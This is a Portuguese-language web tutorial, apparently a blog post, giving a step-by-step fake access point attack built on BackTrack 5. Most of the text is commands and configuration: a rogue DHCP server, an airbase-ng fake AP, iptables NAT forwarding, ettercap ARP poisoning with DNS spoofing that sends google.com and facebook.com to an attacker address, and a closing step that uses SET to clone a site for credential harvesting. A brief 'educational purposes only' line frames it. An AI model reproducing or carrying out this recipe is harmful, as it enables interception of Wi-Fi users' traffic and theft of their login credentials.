Tutorial Fake AP Attack

O ataque abaixo foi 100% arquitetado à partir do BackTrack 5.

Devido ao nível de complexidade, não é aconselhado para usuários com pouco conhecimento em linux.

Não esqueça de trocar os ip’s, canais, interfaces, mascaras e demais informações do exemplo abaixo para as de sua rede.

ATENÇÃO: apenas para fins educacionais!

1- Instalar e configurar o dhcp server

– abra um shell e digite:

apt-get install dhcp3-server -y

– abra o arquivo:

kwrite /etc/dhcp3/dhcpd.conf

– apaque tudo do arquivo e coloque (troque os ips):

ddns-update-style ad-hoc; default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 200.204.0.10; range 192.168.1.2 192.168.1.253;

}

2º criar fake ap

– abra um shell e digite (troque a interface, canal e AP):

airmon-ng; airmon-ng start wlan0;

airbase-ng -e “TEST_AP” -c 9 -v mon0;

– abra outro shell e digite (troque os ips e mascaras):

ifconfig at0 up; ifconfig at0 192.168.1.1 netmask 255.255.255.0;

route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1;

echo > ‘/var/lib/dhcp3/dhcpd.leases’ mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd; dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0; dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0; ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid;

dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0;

3º configurar firewall e port forwarding:

– no mesmo shell (troque os ips e interfaces):

iptables –flush; iptables –table nat –flush; iptables –delete-chain; iptables –table nat –delete-chain; echo 1 > /proc/sys/net/ipv4/ip_forward; iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE; iptables –append FORWARD –in-interface at0 -j ACCEPT;

iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to 192.168.0.1;

4º ativar monitor de redes wireless:

– abra um shell e digite:

airodump-ng mon0

5º configurar dns spoof:

– abra um shell e digite:

kwrite /usr/local/share/ettercap/etter.dns

– apague tudo e coloque (troque os dns’s e ip’s para os que desejar)

*.google.com A 192.168.0.100
*.facebook.com A 192.168.0.100

– salve o arquivo e no shell digite (troque os ips e interfaces):

ettercap -T -M ARP -P dns_spoof -i at0 /192.168.1.1/ //

6º clonar site pelo SET

Use o set para clonar a página especificada no arquivo etter.dns (ex:facebook.com) .

Funciona com qualquer ataque (java applet, credential harvester, etc…).

Leandro Silva – www.casasbrilar.com.br

L99

Um site de variedades.

  • Página de exemplo
  • Enviar sua Postagem
  • Política de Privacidade
  • Termos de uso
  • Atividade
  • Membros
  • Registro
  • Ativação
Este é um site do grupo B20
Pular para a barra de ferramentas